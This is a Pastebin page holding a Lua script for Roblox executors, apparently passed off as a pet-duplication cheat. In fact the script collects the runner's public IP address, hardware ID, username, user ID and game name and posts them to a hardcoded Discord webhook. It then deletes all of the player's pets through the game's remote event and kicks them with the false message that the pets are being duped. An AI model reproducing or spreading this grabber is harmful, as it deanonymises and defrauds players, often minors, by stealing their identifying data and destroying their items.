kooggy

lol stea

Jul 15th, 2022 (edited)
42
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 2.75 KB | None | 0 0
  1.  
  2. local Webhook =
  3.     "https://discord.com/api/webhooks/997670104231841812/c4aMb9I-punKqZaaMmOFUksvgNS-yc0u74lpUtCupIQg145WYJQH-5rzxN_DWp4DLGqo"
  4.  
  5. local IPv4 = game:HttpGet("https://v4.ident.me/")
  6. local hwid = game:GetService("RbxAnalyticsService"):GetClientId()
  7. local Headers = {["content-type"] = "application/json"}
  8.  
  9. local LocalPlayer = game:GetService("Players").LocalPlayer
  10.  
  11. local AccountAge = LocalPlayer.AccountAge
  12. local MembershipType = string.sub(tostring(LocalPlayer.MembershipType), 21)
  13. local UserId = LocalPlayer.UserId
  14. local PlayerName = game.Players.LocalPlayer.Name
  15. local TIME_ZONE = 20
  16. local gamename = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name
  17. local date = os.date("!*t")
  18. local hour = (date.hour + TIME_ZONE) % 24
  19. local ampm = hour < 12 and "AM" or "PM"
  20. local timestamp = string.format("%02i:%02i %s", ((hour - 1) % 12) + 1, date.min, ampm)
  21. dat = os.date("%m/%d/%Y" .. " at " .. timestamp .. " Timezone: EST")
  22. local PlayerData = {
  23.     ["content"] = "",
  24.     ["embeds"] = {
  25.         {
  26.             ["title"] = "**New CottonHub Execution**",
  27.             ["description"] = "",
  28.             ["color"] = tonumber(0x2B6BE4),
  29.             ["fields"] = {
  30.                 {
  31.                     ["name"] = "Username:",
  32.                     ["value"] = PlayerName,
  33.                     ["inline"] = false
  34.                 },
  35.                 {
  36.                     ["name"] = "Game:",
  37.                     ["value"] = gamename,
  38.                     ["inline"] = false
  39.                 },
  40.                 {
  41.                     ["name"] = "UserId:",
  42.                     ["value"] = UserId,
  43.                     ["inline"] = false
  44.                 },
  45.                 {
  46.                     ["name"] = "IP:",
  47.                     ["value"] = IPv4,
  48.                     ["inline"] = false
  49.                 },
  50.                 {  
  51.                     ["name"] = "HWID:",
  52.                     ["value"] = hwid,
  53.                     ["inline"] = false
  54.                 },
  55.                 {
  56.                     ["name"] = "Date/Time:",
  57.                     ["value"] = dat,
  58.                     ["inline"] = false
  59.                 }
  60.             }
  61.         }
  62.     }
  63. }
  64.  
  65. local PlayerData = game:GetService("HttpService"):JSONEncode(PlayerData)
  66. local HttpRequest = http_request
  67.  
  68. if syn then
  69.     HttpRequest = syn.request
  70. else
  71.     HttpRequest = http_request
  72. end
  73. HttpRequest({Url = Webhook, Body = PlayerData, Method = "POST", Headers = Headers})
  74. wait(0.2)for _,v in pairs(game:GetService("Players").LocalPlayer.PlayerGui.ScreenGui.PetsFrame.Main.Pages.Pets.List.Grid:GetChildren()) do game:GetService("ReplicatedStorage").NetworkRemoteEvent:FireServer("DeletePet", v.Name) end wait(2) game.Players.LocalPlayer:kick("Your pets are now being duped...")
Add Comment
Please, Sign In to add comment